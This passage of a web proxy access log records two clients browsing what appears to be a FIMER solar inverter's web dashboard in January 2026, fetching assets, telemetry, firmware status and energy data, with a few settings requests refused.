"http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/index.css?version=1729759760754" [Client 84.1.26.27] [Length 46644] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/index.es6.js?5470dfb553c45ab13d14" [Client 84.1.26.27] [Length 491776] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Fimer-Grotesk-Bold.woff2" [Client 84.1.26.27] [Length 35332] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Regular.ttf" [Client 84.1.26.27] [Length 42239] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Fimer-Grotesk-Regular.woff2" [Client 84.1.26.27] [Length 34828] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Bold.ttf" [Client 84.1.26.27] [Length 42386] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Medium.ttf" [Client 84.1.26.27] [Length 42417] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/fa-solid-900.woff2" [Client 84.1.26.27] [Length 78268] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 84.1.26.27] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/assets/fimer-solar-2.jpg" [Client 84.1.26.27] [Length 66542] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 84.1.26.27] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 84.1.26.27] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:07 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 84.1.26.27] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 84.1.26.27] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 84.1.26.27] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 1672] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 404 404 - GET http fimer.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 181] [Gzip 3.22] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 84.1.26.27] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 84.1.26.27] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 84.1.26.27] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 84.1.26.27] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:08 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:09 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:09 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 84.1.26.27] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:11 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 84.1.26.27] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:11 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 84.1.26.27] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:12 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 306] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:12 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/measures" [Client 84.1.26.27] [Length 337] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:12 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/modbus_device_monitor/device/list" [Client 84.1.26.27] [Length 180] [Gzip 3.24] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:12 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 1674] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:12 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/grid_power_ctrl/obj/max_abs_active_power?scope=setting" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768517999999&bin=week_of_year&aggregation=diff" [Client 84.1.26.27] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/private/setup" [Client 84.1.26.27] [Length 111] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 204 204 - GET http fimer.profibot.hu "/v1/elc/config" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768517999999&bin=month_of_year&aggregation=diff" [Client 84.1.26.27] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 84.1.26.27] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768517999999&bin=yearly&aggregation=diff" [Client 84.1.26.27] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:13 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:17 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 1676] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:07:48:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 404 404 - GET http fimer.profibot.hu "/favicon.ico" [Client 37.76.46.26] [Length 181] [Gzip 3.22] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.46.26] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 37.76.46.26] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.46.26] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.46.26] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.46.26] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.46.26] [Length 1675] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.46.26] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 37.76.46.26] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.46.26] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.46.26] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.46.26] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.46.26] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.46.26] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.46.26] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768517999999&bin=week_of_year&aggregation=diff" [Client 37.76.46.26] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/grid_power_ctrl/obj/max_abs_active_power?scope=setting" [Client 37.76.46.26] [Length 22] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.46.26] [Length 1669] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.46.26] [Length 306] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/modbus_device_monitor/device/list" [Client 37.76.46.26] [Length 180] [Gzip 3.24] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/measures" [Client 37.76.46.26] [Length 338] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/private/setup" [Client 37.76.46.26] [Length 111] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" 